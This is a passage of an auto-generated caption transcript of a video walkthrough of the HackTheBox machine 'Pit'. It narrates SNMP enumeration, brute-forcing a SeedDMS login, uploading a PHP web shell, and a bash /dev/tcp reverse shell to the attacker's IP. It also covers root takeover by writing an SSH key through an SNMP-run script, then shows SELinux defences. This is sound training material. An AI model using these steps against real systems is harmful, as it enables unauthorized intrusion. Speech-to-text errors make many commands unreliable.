HackTheBox - Pit

Video Statistics and Information

Video

Captions Word Cloud

Reddit Comments

Captions

what's going on youtube this is ipsec i'm doing pitt from hack the box and i really like this box because of how much value it puts on recon if you ever get stuck on the box you go back a few steps look at the recon you did and it will probably paint a path forward too often when people have trouble i mentioned maybe a recon needs improvement and they're just thinking no my recon is good i know how to run nmap i know how to run go buster but they don't understand how to look for the subtle things and with this box it really shows you that because you run just your basic things you get access to two web servers can't really do too much you find some paths in snmp that leak a directory that you can use on a web server to get access to the seed dms application with that once you log in you notice the change log says it's running a version and comparing the version against search point it shouldn't be vulnerable but you look at the change log to find out how they patched it and they patched it with htaccess and looking at nmap it says it's running nginx so if you still run through the exploit manually you can pop the server once you get a shell on the box you're looking around and you see oh this is running se linux because all the directories have this little period at the end of the permissions which is an indicator of selinux which does become handy in this box additionally we'll go over selinux at the very very end but you're having trouble prove asking you go back to the snmp output notice something weird that it's executing a program look at that program you can get execution through snmp and pop the box so with all that being said let's just jump in as always we begin with nmap so dash sc for default scripts sv enumerate versions oh a output all formats bring the nmap directory and call it pit and then the ip address of 101010.241 this can take some time to run so i've already ran it looking at the results we have just three ports open the first one being ssh on port 22 and its banner tells us it's open ssh 8.0 now this is a little bit weird normally i'm used to seeing some type of like for ubuntu 0.3 or 2 or something like that but we just see open ssh it's very similar to like the banner we did on a box a long time ago like crossfit 2. we look at that one which was a bsd box uh we can see this is just saying open ssh 8.4 so these banners are very similar this turns out to be a red hat box that we'll find out eventually but i'm just pointing out the type of recon you can kind of do on things like this and even like a debian default banner if we look at i think delivery i did it in debian this says debian 10 deb u2 so right now we just know it's probably not ubuntu or debian based upon that banner and thinking maybe bsd centers red hat i don't have a center's box off top my knowledge or off the top of my head to compare the banner with but yeah that's what i'm thinking right now then we have http on port 80 and it's running engine x 1.14.1 and we don't really see too much else um we have a 90 90 open this looks like it is going to be http as well because we can see these banners scrolling down we don't have anything else so one thing that we should be doing that i don't show my videos enough is a udp port scan so i'm gonna do dash s capital u on 10 10 10 241 and we can do dash o a and my app pit dash udp uh yeah that should work so let's go over to port 80. so 10 10 10 241 and we get welcome to engine x on red hat enterprise so this tells us we are definitely running on red hat we could take a look at that other port so port 9090 let's do 990 it directs us to https and we should always look at certificates when it is we get a dns name of dms-pit.htb so let's make sure we resolve to that so sudo vi etsy host and then 10 10 10 241 dmi-pit.htb and that is it that is also in the nmap script or nmap scan so if we do less and map pit dot nmap look all the way down here we can see certificate common name dms that dash pit so let's take a look at what this page is and we have pit.htb this is running centers so it is not red hat um red hat is like the commercial version of center center is just an open source fork so it's always kind of weird when you look at things and things conflict but nginx they just didn't change the banner here on 90 90 is definitely going to be centos or centers i don't know which pronunciation is correct but trying to figure out exactly what this application is we have window cockpit pl and i think red hat or centers has cockpit so let's do centers cockpit go to google i can see what this is it is definitely a project and we could read more into this but we'll just find out eventually exactly what this is but this is the type of recon i would be doing on the box to understand um there's an application that's very similar to that uh for the life of me i can't remember i think it runs on port ten thousand um oh it's webmin uh w-e-b-m-i-n is what cockpit is very similar to so we kind of know what's here we need credentials to log in we could go for googling like cockpit default credentials but it uses the credentials that are on the system so it doesn't really have any default as i say that i am wrong so we can try this simon generates the default password of admin 123 bang so we could always try logging in with admin and admin 123 bang but uh we get wrong username and password it is telling us the server is pit.htb so let's also add that into our host file so go over here pit.htb save it we can see that udp scan is still running so these do take a long time to run that's why i don't show it every video because it's really useful but when it is useful it is extremely useful so always have some type of recon running on the background um you never know when it'll come in handy so right now we just have welcome to nginx so i'm going to try each of the names so pit.hdb we also get that we also had dmi-pit was it dmi let's see dms dms-pit.htb and this one returns 403 forbidden so we should start a uh go buster on this so go buster dash u http uh dms-pit.htb dash w for wordlist opt set list raft discovery then web content raft small words.txt and we don't know exactly what this is running we could go back to just um 10 10 10 241 and try index.html index.php ooh index.php oh it's not found this is just a fancy 404. if i try like uh go to please subscribe we get pages not found so yeah fancy for a four page so we don't know the extension so i'm not going to run it with a descent extension and we'll do go buster.out uh we need to specify dirt mode dir there we go so we have slash config it is giving us a 403 anything with a period first is looking like it is 403 hardly enough dash wp config is 403 is everything here let's try dm what was the name dms dash pit dash pit.htb 404 so if i do wp-config i didn't do the dash there 4 3. so let's do please dash subscribe we get 404 so that is where that wp-config gives 403 does um wp-content 404 not found so there's something weird going on here that i don't know yet uh wp-config is a default wordpress directory um also a default directory i believe is wp-content we can confirm a substitution by going to wordpress github and finding out what it is yeah wp-content oh wait wp-config is not a directory that's a php file i think it's also can be a directory sometimes i hate doing some things live but we have a lot of weird things that we can't understand why they're going to 404s going back here nmap still is running it is only 43 or 45 done one of the common things that is running on udp is snmp so let's just try doing an snmp walk v2c this is the default version of snmp on most things dash c public this is the default password for snmp it's a community string not password but they operate kind of the same way so we do 10 10 10 241 and when we crawl it we get data back so what i'm going to do is we'll use t to do snmp snmp.output and just let this crawl it'll probably take uh three to four minutes for it to run so i'm just going to pause the video and we'll come back to it once all this output is done i probably would be poking at like more gearbusting maybe setting up to do a virtual host bust since we have multiple virtual hosts in play already but for the sake of the video we're just going to let s and mp run so the snmp scan has finished and right off the bat i see some really interesting things here uh all this like se linux stuff memory usage it's outputting things i'm not used to seeing an snmp like this is the full output of a command it looks like like it doesn't have this snmp mib is that what i think that is called but all those numbers before is just weird if we scroll up enough we can see user bin monitor and that's not a default program so this is definitely odd um i'm gonna just look at the output and we could just less it like this but well here's a good example if we go to the bottom i really just hate viewing things that are like multi like with line wrapping i guess i should say so how i'm going to view this is with less dash capital s and then we can just view it so everything is on one line and kind of get to what is interesting to us uh looks like we have audit d running with some things uh we have php right here so we know the server is php i should probably go back and change my go buster to having the php extension just by seeing that we keep going down we have more text over here just kind of glancing at the text that snnp gives us um [Music] i don't know exactly what this is from it kind of looks like send mail or something with a bunch of arguments but just going down viewing all the snmp information this is where it gets weird so we can also just grip things out of snmp so if we grep like html out of snmp that's a good one to do we can see it gives us var www.html seed dms 51x slash cdms so i'm thinking right now this is a virtual host so i'm going to try just going into the seed dms folder and we can go here and say cdms we get 404 not found and i'm also going to try putting this as the folder so if i but this we get a 4 3 forbidden and actually added a slash for me did it add a slash for me when i did wp config it does not um so that's another small thing you can do when enumerating is notice those super super super subtle things so if i do curl dash i dash v was it dms-pit.htb this should be 403 forbidden so we do wp dash config we get 4 3 forbidden if i do oh shoot what was it let's go back here cdms51x it's probably gonna send me a 4 3 or 301 redirect yep there we go we get a 301 redirect and that directs us to the director with a slash before giving us the 404 or not 4 4 the 403 access denied so this is good knowledge to know and just small bits of recon that i think a lot of people just undervalue is just noticing their small subtleties like we went down this path it's super obvious now that i'm doing it in the command line looking at headers but just being able to notice it like this and oh wait i didn't put that slash there the computer did that for me that's something that just kind of takes experience and something you should always be looking at how do applications behave differently when i do certain things so let's try going into the seed dms directory in here and we can see we get a whole application so knowing this exists the very first thing i would do is probably google to see if this is open source so we can just google like github cdms we can see there is a github project of it we got index.php [Music] requirements it's a web-based should probably read all this to understand the application but right now i just want to identify if this is actually the correct thing so i wonder if there's a readme ubuntu on this box cdms if we do readme.ubuntu 404 not found and here not found let's try it in this directory so maybe this isn't the right application or the readme is just not there see is there anything that makes sense here uh we got out and whoops this tab we are in out and then out.login.php that looks pretty unique and this is kind of how they are doing things so this definitely looks like the application we can look at the issues and it says readme.htb on readme.ubuntu um [Music] i don't understand that but whenever you enter some type of issue it helps to say what the issue is other than just i have problems we don't have anything closed no polls so this is definitely weird um see if there's anything else does this application have a website so we just google cdms maybe github's not the place we do have a website so let's see if there's anything interesting here website is php features demos support we got a change log and we have version information so based upon seeing cdms51 i'm gonna guess that is version five one so we're on five one x looks like it goes up to 6 0 we can download this and see if there's anything that would say the various versions it is hosted on sourceforge not github see where do i download it five one get will be updated regularly see let's just go to sourceforge and see if there's a release it looks like there is so five one two one this is the closest thing we have and this could tell us some files so let's get out of that move downloads cdms tar zx vf on that file five one x that is looking good define dot grep dash i change and let's see we have a change log right here but it's going into this folder which i don't think that would exist i wonder if we can specify like versions here let's see let's see if dub dub dub exist or conf exist if those exist then i am going to play with that to enumerate the version so dub dub dub see i'm actually going to use curl so dub dub dub what does this do moved permanently to slash if i do dub dub we get 404 not found so we do have potentially a way to enumerate versions as long as that directory exists so what was it cdms-5 so decede dms-51 and we can say 1 4 4 not found 2 2. so at this point i'm probably going to switch to w fuzz dash u and we'll say this is fuzz and the reason why i'm using w fuzz is because it has this range option i don't think um fuff does but this should let me fuzz 5 1 and all numbers let's see out of range dash u http like that let's see oh it's 1-22 i always screw that up i think like min comma max but it's range comma min 2 max there we go and let's see we get 404 for everything yeah we do so i'm guessing we can't enumerate the version this way but that is definitely something i would be playing with when doing this box so let's see that is doing it correctly let me just get rid of those single quotes but i can't imagine that doing anything everything is four forward okay so that looks like a rabbit hole the next thing i'd probably do is try looking for default credentials so we do seed dms default credentials and i'd also whoops run like search boy so here we go admin admin doesn't work we can do search sport seed dms and we can see scripting for up to 1.18 but we don't really have a way to um [Music] perform cross-site scripting because we don't have anything we can send we could just look at it and by send i mean like we don't have a comment field something for someone to interact with let's see reference source and see just how it is for sanity published where is it discovered it's in post ad event so unauthenticated users probably can't add event so i'm just going to ignore that we can look at like the remote command execution and see what this is it doesn't say unauthenticated so i'm guessing yeah uh we can't really do that much with it we're uploading so we're logging in add document and upload a back door and this is for versions less than five one eleven but we need a way to authenticate so what i generally do is build a brute force script for this real quick so let's do cd dot dot let's v login dot pi i'm going to definitely need to import requests and i have not done this before so hopefully it works um if i was doing this as a like actual thing i'd probably install cdms locally so i know i have credentials that work but i'm going to treat this like i don't have access to the source code and i have to do it blindly so i'm sending a post i don't have a cross-site request for a jtoken so that is a positive um and it's sending me back to login.php so what i'm going to do is automate logging in in python checking the location and if it doesn't direct me to login.php i report something so let's do this um we can say request.post http what is it dms dash pit dot hdb slash all of this okay and we also need to set the data so data is equal to login username and then the password is going to be pwd and then we just set laying to nothing like that i'm going to create this a function so we'll call this def login username password okay see here we can say data is equal to data and we want to print the header so i'm just going to import pdb pdb dot set trace i think it's that trace python3 login.pi actually can't do that yet we can say login test test python3 login.pi okay so we have now debugged the application which means we can do r all right.text wait is that what i called it r is equal to request.post oh i think i know what it did um r is probably a actual like command and pdb so if i do d-i-r-r we want headers so we can print r dot headers let's see don't see location so we get the server header so this is definitely the response so we go server date content type server date content type connection close powered by location this is different the chunked keep alive powered by and that's not right print r dot status code 200 it's a three oh um we're probably redirecting uh following redirects so by default the request module will follow a redirect if we change it to allow redirects equals false we should be able to print our dot headers and this looks better we have this location so let's see how do we get a header let's go here google request python get header i have to specify google using headers with this dot get s dot headers dot get or update i want there's a dot get print r dot headers dot get oh this is actually a dict we can probably just do location i should have read the object type better before going to google but yeah it being in these um whoops weird brackets yeah as i told me so we can say if login.php is in location we can say incorrect um we can look for this string this entire string actually okay so if r dot headers location is equal to the string return false return true you can say if login print success so we run this we don't print success i can say if not login and yep it's good so we have logic checking if we have a valid login the next thing i want to do is just import sys and we'll do argv so here print sys.rgv i think one will get username so python3 login.pi ipsec yes yep we only want that so here what i would generally do is come up with a handful of passwords and try logging in with them so let's say passwords is equal to sys.rgv1 so that's testing the um use same username as password then we can say summer 2021 bang winter 2021 bang um password one bang we can create a quick password list this way and we can say for password in passwords and then do this login there's probably like a fancy lambda function i can do to do this all in one line but i'm lazy and like simple code so that's how i'm doing it so we can say password and sys.org v1 probably should say like user is equal to sys.rgv1 to clean up the code to make it easier to read what we're doing user if i python3 login for root it's going to try a few logins we don't get any successes so we can just keep going down the train now there is normally usernames in the snmp output so let's check that so snmp.output and see if there's any usernames linuxpit root these are all integers so i'm going to remove anything with integer because that is not needed and i'm going to use vim actually so we can say vim so i can just do probably slash integer slash d percent slash integer i n t e g e r d that deleted everything um let's try colon g integer slash d that's looking better so we removed 600 lines okay so we can just keep going through to see if we see like user names we could try like slash user slash i oh wait we may have something here se linux systems user these are groups like we have root staff user u x guest um right here we have a username michelle so we can try michelle i'm not going to save that i can just grab i snmp output um yeah michelle like this nope we do michelle at the start and she only exists in that one location the reason why i did this is to kind of be thorough so just because i found one username doesn't mean users aren't in the snmp output in other places so i was just kind of checking like um if she exists in another place that other users may be there but doesn't look like this case so let's do the python again with michelle and we get a success but my bad coding doesn't tell me the password um typical me so let's print password so her password is one of these login and her password is michelle so we can try logging in with michelle and see what this gets us we have now logged in so we have an upgrade note right here so if we look at this we have dear colleagues based upon a security issue in the previously installed version 5110 i upgraded seed dms to version 5115 see attached change log4 information so we already kind of have this change log but um might as well just use the one they've attached because we downloaded the whole application that's why we have it cp downloads change log i think this is it yep this is cdms the other thing to keep a note is if we do search point for a seed dms it's only going up to five one eleven and a change log specifies it is five one fifteen so we're in a higher version if we look at the changes to five one eleven let's see we have remote command execution through unvalidated file upload add.ht access file to the data directory and this is interesting and why i called at the beginning of this um video like oscp like because in my mind the oscp exam when i took it was all about doing good recon and if you go back to the recon here there's one key piece of information that a lot of people kind of just skip over this is an nginx server engine x doesn't do htaccess um i wonder if we can find a post real quick that's interesting engine x dot ht access let's see does this pull it up examples how can i use no wait wait a second it's the first result um i'm used to this being an ad so my eyes just ignore it but yeah i just found this page funny um like apache hd access you can't do this you shouldn't and if you need hd access you're probably doing it wrong which is kind of a clue that this patch doing it wrong by just using hd access to try to prevent a um exploit so we can try to test this still so let's just run through the exploit even though um it says it's patched so search point see dms so let's go through here see uh exploit x so we have to log in and then add a document so this is what we have to do so let's go back to dms and find out how we can add a document well there's a docs directory so let's go here um don't see anything different i'm looking for like an upload or create or this action button not to be blocked out so i'm gonna go to users we have two we have jack and michelle michelle actually has actions she can do i'm not going to delete it i think that x is delete so once we go into this we can add document so let's add something um we call it please subscribe and then if we scroll down we can add a local file so i'm going to create a quick shell and this back door is actually probably something you should be using um the main reason why i say that is normally in my videos how i do back doors i just do like php cmd request cmd like this but if you don't set this parameter then the web server is going to error out we can just do this real quick php dash capital s 127.01 i think that's all i need uh let's do port 8000 so if i call localhost 8000 test.php we can see it is not found wait i wrote show.php and well wrong file name um the php web server is actually not giving me errors out here but in a lot of web servers if error messages are displayed this would go to the user and this undefined index cmd would tell them the command that they need to abuse your web shell so what the search point is doing is checking if this parameter exists first and then running the command and why this is good is because if you wanted to like be secure and not let other people use your web shells you would do this and then change cmd to be something that someone would never guess as long as they don't think it's me exploiting the box i doubt they would guess please subscribe as a parameter but yeah so that's what we do uh this echo pre all this is doing is um [Music] like making the html look pretty uh if you don't have this then everything's probably gonna be on one line because by default html line breaks by like um br like that that pre tag will make line break also work with just a normal line break so decent web shell would recommend using that other than just a one liner you type up half hazardly so let's go to browse we can do [Music] htb pit and then the file shell.php and we can add the document so we can see please subscribe exist if we go back to the web shell uh the search point we can see how to use it and this is a little bit unintuitive they have a directory they say go to example.com data 104.8576 and that's actually a default directory so you just want this to exist well you don't want to exist you just don't have to overthink this um if i was just looking at this payload i would think this is some weird like date that documents get uploaded or some type of id but the document id comes on after and then one dot php so all we need to know is the document id if i go to download this in the bottom left hand corner i can see document id equals 30. so i think we have everything we need to make this payload work only thing is we have to know where this data directory is so i'm just going to go to alt data see if this exists 404 not found remove out cdms 404 not found let's go up one more directory and we get 403 forbidden so chances are that directory exists let's try this 1048576 403 forbidden and the key thing also is it is adding that slash for us so we got a redirect because it existed and then we went to forbidden then the last thing is document id we said that was 30. so let's do 301.php we get nothing if i say please subscribe is equal to id boom command so let's try getting a reverse shell sending it over to burp suite let's intercept on send uh go to repeater let's change the request method so we put everything in the post bash dash c bash dash i dev tcp 10 10 14 8 9 000 1 0 and 1 like that and then control u to url and code it and see lvmp 9001 click send and it comes back right away we don't have a shell so something is weird maybe we mistyped this command or maybe like something exists on this box based upon the snmp output it did end with like se linux stuff so if i get snnp out.out uh we should see these are se linux things so probably right above it we do have sc linux however if blocking reverse shells probably isn't the first jump i would do i would be thinking like ip tables so i do ls la on etsy because generally iptable saves in a directory like etsy iptables or something and whoops one thing i really notice is there's a period after every permission and this is also indication of se linux so if i just do like lsla we don't have that period we do it here so again a small little recon tip noticing that periods like oh maybe it's um se linux we can search for like ip tables we don't really have anything so my next step is well we're dub dub dub data or not www data engine x i can cat etsy pass wd and look for engine x because i want to try to get like act like shell access to this server um it's s been no login so if i dropped an ssh key does me no good because i can't log in so my next bet is to um look for password reuse type thing and the best way to get a password is to look in the web service config to see how it access the database i'm doing pwd so i can see my path is here i probably want to go into the seed 51x directory so i go up three directories so if i do ls dot dot slash dot dot slash dot dot slash we can see a config so let's go there and we have settings.xml so let's do settings.xml do cat and here we go we have seed dms so i can look for password we have 19 matches lots and comments um database nine comments or nine matches let's try typing my database names like mysql one match so this is probably where i'm gonna start database name is localhost db database user and db password so we can check this password so i'm going to do cat etsy pass wd let's make sure i saved that password oh is it the wrong die click copy it let's do ctrl shift and uh yeah ctrl shift insert there's two clipboards on linux um i always choose the wrong one for some reason but we just have the pw there so what was i gonna do we are looking at a web shell and burp i'm going to cat etsy pass wd again and i'm just looking for users so we have rng cockpit i probably just want to grab all this honestly and grep for sh so v temp grep sh dollar on temp so it ends with sh pretty much only two users root and michelle so i'm going to try ssh michelle at 10 10 10 241 and we get permission denied it only accepts public key so let's try the other service we have access to which is cockpit so 10 10 10 241 port 9090 and let's access this center's linux michelle um password oh that's not it let's cat pw this is why it's always handy to save the password um if i was doing this like not recording i would probably use obsidian or something to take notes as i go but that adds like 20 minutes to each video of taking proper notes so you can just search ipsec dot rocks for obsidian and probably find a few videos of me using it so we're in this web application we can do se linux and try turning it off oh error can't so let's go over to terminal and this is weird um ls well it looks like it's working but we get a bunch of junk i'm gonna click reset nothing happens let's change the appearance um it wants html5 canvas image data let's allow this and then when we change everything works so it just was a weird browser thing blocking access so let's do lsla and we have a shell on this box while i'm here go cd.ssh i'm going to see if um we add in an ssh key if it will work the main reason i'm doing that is because something's blocking the reverse shells so i want a reliable way i can get onto the server ssh keys are pretty reliable so let's do ssh keygen dash f i'll call this pit put no passphrase on it sage mod 600 pit and then let's cat pit.pub and we'll copy this into her ssh directory so echo this to authorized keys okay ssh-i pit michelle at 10 10 10 241. and that does not work i expected it to um let's do chmod 600 authorized keys see unspecified gss failure well that's probably always there cat authorized keys it is there michelle owns it a-u-t-h-o-r-i-z-e-d underscore keys this is weird um i'm probably doing something really ridiculous lsa on pit cat pit that is the private key m-i-c-h-e-l-l-e m-i-c-h-e-l-l-e huh so what i'm going to try doing is let's copy pit.pub to ssh authorize keys we can say pit hipsec at localhost and see if it lets me log in here it does if i remove that authorized keys it doesn't so my authorized key file is correct let's md5 summit real quick pit.pub 39733 [Music] md5sum authorized keys same exact file so maybe this user just doesn't have ssh access which is weird um cat etsy ssh shd underscore config can't access it uh let's see lsla on etsy sh shd config and we can say dot rpm new so this is slightly different than what is there so maybe this user just doesn't have ssh access or i've screwed something up hilariously that i'm going to hate myself when i read comments but we can do everything here from this prompt the key piece of information now is thinking back to snmp.out and if we look at this let's go g right where i said it's weird we have this user bin monitor and what's happening here is it's executing this script and putting a bunch of information down below i wonder if this is a known mib it is like execute mib let's just google this and we'll probably come up with some spoilers of the machine but hopefully we come up with legitimate documentation okay we can just ignore that so i don't know what this mib is names called i don't know snmp well enough to figure out how to trace this i just know i see binary and then c random data i'm going to go over here and look at that binary so let's do cd user bin and file monitor it is a bash script so we can less monitor and see what it does it says for script and user local monitoring check star sh do bin bash script so let's try writing something in there um we can say echo wait what is it user local monitoring copy echo let's do echo please subscribe to use a local bin monitoring check 1.sh i think it's checkstar.sh so we just have to write something and then i can run this snmp walk again so do i have it here snmp walk v2c dash c public 10 10 10 2 41 and we'll just let that run and the one thing about this that i did not mention is a lot of people may just ignore this and like run into a brick wall because if i do lsla on that directory we get permission denied if i do lsla user local grep for monitoring uh spelled it wrong we can see we don't have access root root and then no one but we have a plus and plus means there's extended permissions so we can say i think get fackle user local monitoring and we can see michelle actually has write execute so the extended permission of this is just so you can grant individual users because originally it's like um earner group everyone else and it doesn't have a bit to set it specific for users so the extended attributes let you do that so we can see michelle can write execute but she can't actually um read from it but you can write in it and it's funny because if i do two dollars or two like direction signs i'm probably gonna get a failed because by default this looks of the file and then appends to it um because it can't look for the file or it can't read the file it can't append so we get permission denied uh this snmp walk is still running so i'm just going to wait for it to finish so we'll pause the video and see exactly what happens okay so the snmp walk is done and we go up to the top and we can see it just says please subscribe it doesn't have the echo here so i know it actually exited your code if it said echo please subscribe i'd be like oh it just outputs the contents of the file but because it doesn't have echo i know it executed something and the reason why i chose echo and not like id or something is because i have a lot of like just information about things running and id i may be like oh was that there before is that mine so that's why i chose echo and did a unique string and i didn't go for like a reverse shell or something like that off the bat because when you're enumerating exploits you want to keep it simple and um yeah because if you start complex like making it complex and it fails you don't know if it failed because of a hundred reasons because it was complex or just something simple like the exploit didn't work so now that we know that works we can go back here and let's try sending our ssh key there so i'm going to try this ssh key thing again so echo and we need to let's see uh where is my ssh key ls cat pit.pub so we can copy this so echo that to slash root slash dot sh authorized keys i wonder if michelle i said key and this is keys that'll be hilarious um just directed to check one dot sh that should be fine run this snmp walk again and we gotta wait for it to finish so let's see ls dot ssh no i have keys it's gonna be funny maybe i see linux blocks or login or let's see is there like ls etsy ssh it's like a login.allow or something i remember i'm not sure but we'll just wait for this s um thing to finish snmp walk to finish now that the snmp walk is finished we can try it again and we get in so from here we can just read root.text and that will pretty much be the box but not the end of the video there are a few things i wanted to mention the first one being um if that snmp thing doesn't work try it again the one thing i probably would change about this is every five minutes it creates this cleanup script and if you look at the cleanup script it's just going to be removing all the scripts and user local monitoring what i would have probably changed about this box is just make sure it only deletes files after they exist for five minutes because it takes me like three minutes to run the snmp walk so around half the time you're probably gonna lose that race condition just as a coincidence of you create that um file to get executed the cron goes and cleans up the directory and by the time the snmp wall gets to your script it just doesn't work so be in mind of that when you're doing this box but the last thing i want to talk about is se linux because it's probably one of the most important security features to linux but the first step of installing links for most people is just disabling it all together because it can break things and people get scared when things break so what is sc linux well it's a mandatory access control system but what's that mean exactly remember earlier in the box where we talked about the extended file permissions that allowed michelle to specifically write to that directory and no one else now imagine that for every action on the server we're not just talking about rights we're talking about binding to a socket connecting to a network port reading a specific file and it's not even every action like all those actions for users it's also a label of like the application that's running for that user so there's a lot of things so if like snmp is running as root but it's got the snmp label it still doesn't allow you to do everything that root can do as you can imagine that breaks a ton of crap thankfully we don't really manually configure se linux nowadays you just use like set enforce to turn it into permissive mode so set enforce um zero i guess to turn into permissive or one to turn it into enforcing uh when it's in permissive all it does is say like this would have been blocked but it's in permissive mode so we allowed it and even if um you don't plan on ever enabling se linux that's still a super handy thing to have so you don't want to disable it because if someone does a web shell like if they hack your server they send a web shell if you have se linux in permissive mode there's a high chance that a log is going to be generated that says hey this web server connected to the network but you're in permissive mode so we just let it be um the main way to just allow things is just running like audit to allow and it's going to look over your se linux log you look over each thing like yep i accept that i'm going to cat it to the output but this doesn't really make for good learning opportunities in man it can take a while so while that runs let's get another ssh lesson to this box so sh i pit 10 10 10 2 41. because i want to oh i have to specify root to like explain what these rules are and like demonstrate s linux and just doing like the auto prone button to just make se linux works isn't that great for a demo so let's go up here and we can say uh actually go to reverse shell so let's do this which i believe will be blocked i think we have to do document 33 now does that exist it does okay so i'm going to set it to port 9001 and i'm going to nc lvmp on my localhost on 9001 we're going to run this and we don't get rid of a shell nothing happens here so what i want to do is look at that audit.log file so let's grab denied on verlog audit audit.log and near the bottom uh this message keeps getting generated it's a d bus one we're going to always ignore this but we see this one abc that's access vector cache i want to say but it's a name connect so let's grab name connect tail dash one so this is that log line for this event uh it's telling us the pid if we look at that this is probably going to be apache um let's see ps ef grab this nope that's the process that either the apache thread or what bash would have been but bash is trying to connect to 9001 and we get a bunch of sc linux gibberish tcp socket and permissive equals zero so permissive is not on so it blocked it if we had permissive on this would be price of one and it would not have blocked but that's not really human readable so if we do audit to y which is a se linux program it will convert this log into something we can read so abc denied name connect what was caused httpd can connect network with set incorrectly we have to enable this to have um hdb be able to connect to the network and you may be thinking this is a web server it always connects to the network well no it binds a socket to the network and things connect to it and it talks back you really have http reaching out there are cases where you'd have http reaching out to like a database and you can also do like set that as well so set se bull and then we're going to do dash capital p for the policy httpd can network connect and there's a specific one for various things um there is db if we want to look at them that's going to error out because i didn't say one but we can do get se bool dash a and we can see all these things if i look at http let's see that's not that mysql we have bunches of things that http can do so we can say like it can connect to ftp it can connect to ldap myth tv that's a funny one uh that's like the precursor to xbmc or maybe that's after xbmc or xbox media center and then that kind of turned into plex i guess but we got zabbix which is kind of like nagios uh just can't connect in general can connect to dbs so you have a lot of these things so if i just enabled can connect to db so that has now enabled man that audit to allow is still running we go doesn't work but if i do nc lvmp 3306 and specify we want to go on port 3306 boom reverse shell because we allowed http to connect out the databases which is on port 3306 so if you want to do like a good defense in depth this is amazing addition to a host-based firewall to prove that this wasn't iptables i guess i can just do nc3306 and we can set this bool to zero to turn it off and now when i click send we no longer get that reverse shell so that's pretty awesome uh the other thing it will um prevent binding to sockets and it can do this mainly because of specific rules that allow http to only bind to http sockets so if i do nc lvmp 9001 we send this and we're going to do pretty much the same thing so where's this grip we're going to grab denied we're not going to look at name connect because we don't know exactly what the error message is it is name bind so if i do my same thing with audit 2y instead of name connect we do bind run audit to y and it's just telling us it's missing the type enforcement rule if we look at this it is using the context or the target context it's trying to access tor report and by default http only has access to http port if we pipe this over to audit to allow we can see the entry it would write to the config to allow us to do that allow hdpd access to the tor port tcp socket name bind so if someone tried to use the tor report with udp it would fail because we're only allowing tcp it's like the principle of least privilege and if there's no like um allow statement the default thing is denying se linux so we can use like se manage port dash l and this is gonna list what each port is like if i look at 443 we can see that's well pki let's go up here's all the http ports so if i try binding maybe if i bind on 9000 it will actually work let's try that let's do like 9000 or um 8443 oh it would work because that is a default port for linux so nc 1010 10 241 thousand uh [Music] ten ten ten two four no route to host netcat do i specify dash p but that's a source port right ping 10 10 10 241 okay port 80. so i can't bind to port 80 because i'm not using pseudo okay i can do a get request 9000 route to host that's weird um i'm going to try 8443 i was expecting it to say like um [Music] just couldn't connect eight four four three i wonder if there's something in se linux blocking it but i don't think so nc dash l v and p nope that's that's right i don't know why it's taking so long so maybe something else is at play here so let's do this and i guess the curse of the demo gods i was not preparing to go into this uh we don't see anything blocking us on eight four four three we still have the last denied as this 9001 source um iptables dash l nothing there i'm actually baffled to what is happening here see let's curl lvmp8443 when i do this it's now taking a long time let's do 9000 id okay my command shell still works let's see so zv done i don't know what's going on but we'll move on um we could have added a port to that if we look at the tor ports of this grep tour we can see 9001 is one so i guess the last thing i want to talk about is blocking access to files so in the video i mentioned if you tried going to user local monitor and we attempted to read root.text from this snmp thing it fails so let's try this check1.sh cat root root.text okay and we have to snmp walk v2c does see public 10 10 10 241. we can disable that listening and it's going to be like two to three minutes for this snmp walk to finish so i'm going to pause the video okay so now that the snmp walk is finished i can go up and let's see we see the cat root.text permission denied so let's go over to um this and i realized what i did wrong with audit to allow um i need dash i for input log so if i do verilog audit audit.log it will tell me all the things i need to do but we'll go over that at the end of the video so what we wanted to do is grep denied again from var log audit audit dot log and we're gonna go to the last one except not this d bus thing uh we can go to not this d bus thing this cat here we go cat root dot text so it's a read so if i grab this for read tail dash one not greed read audit to um y to tell me and we just see it was missing the type enforcement rule to allow this if i do audit to allow it will tell me that we need to allow snmp the um i forget exactly what terminology this is i want to say the admin home role to allow it to access into these files all the files in like ls dash z slash root we can well i guess i forgot to mention this that z on commands is going to um show the process like the se linux attributes of the process so if i do p s e a f grep apache ps uh it's an engine x and we add a z here we can see it's using the um i think i forget exactly what this is this is domain i think this is role this is user i believe but using the system user role we're going to say and the domain of http and that's what is blocking access for a lot of things so it doesn't the actual services by default don't have access into home directories because why would a service need access into a home directory and that is essentially why we were able to quickly um or not quickly why that access was blocked by default so if we go back to that audit to allow all that's saying is hey if you want snmp to be able to read files in slash root you need to give it that access and that's essentially what the audit to allow dash i is doing on this audit log it's reading that whole log and telling me everything i need to change so i don't know what the stack override capability is uh we could also add the dash w flag and that's going to say y for everything which is going to be a lot of text so we see it's just a type enforcement rule but i don't like using y for audit to allow because it's just a spool of text but you can kind of look over this and see what types of things were blocked um this is allowing connect bind to ports get attributes attribute um vmware tools accessing a file i don't know what that's about uh i'm gonna guess it was trying to read the actual flags and this may be related to like flag rotation but i'm not positive because it's the http user which doesn't make sense to me um crap let's do vm tools exec on var log audit audit log uh let's see vm tools the path read it was doing an ls command i'm not sure why but that's what it was doing so that's what this tells you and again not everything that's blocked is necessarily going to cause an issue and you shouldn't always allow everything but if you just want to get a secure system with se linux running i'd recommend running in permissive mode and then doing this audit to allow and just enabling everything because that's going to be infinitely more secure than not running se linux at all and if you don't even want to do that then just turn it to permissive mode so at least you have things one of the cool things is se linux i think see i'm not blocked let's see id dash z so i'm in a unconfined context so that means um sc links doesn't apply to me i'm i'll show exporting at the end i just thought i was like oh i didn't show you how to export things but we can do at the end so i'm in unconfined context right now for this which is why i can read etsy shadow normally if i wanted to read etsy shadow i would need the specific permission to enable me doing so because it's in this shadow tee thing so or the shadow domain um i think sysadmins by default don't have access to that so let's try um well they don't have access to read it they have access to write it through past wd maybe i forget exactly how that works but let's just see if we can demo it i'm going to do sc manage login dash l and this is going to show me the policies for the users we can see that michelle is in the user context and what this is doing oh um mls this is like classification this gets really confusing but um michelle's in the user context so even if she had root's password we can say passwd and i'm going to set root's password to password like that okay so let's go back here uh michelle clear let's do s u dash type password permission denied wait no i did read it um maybe she doesn't have access to pseudo i'm saying something wrong but if se linux was configured properly and she was just a user that would not have been allowed let's do v etsy sudoers maybe it's this that she's allowed to do um curse the demo gods michelle all all so she can write everything or she can run sudo now if i do sudo l uh michelle's password i don't want to type that that was a painful password let's just do passwd michelle password password okay password okay michelle can run let's try doing sudo su can i switch users password i can't so oh no i can bad demo of se linux that's what i get for going live but let's see if i can disable root from accessing shadow and again don't know if this is going to work i'm 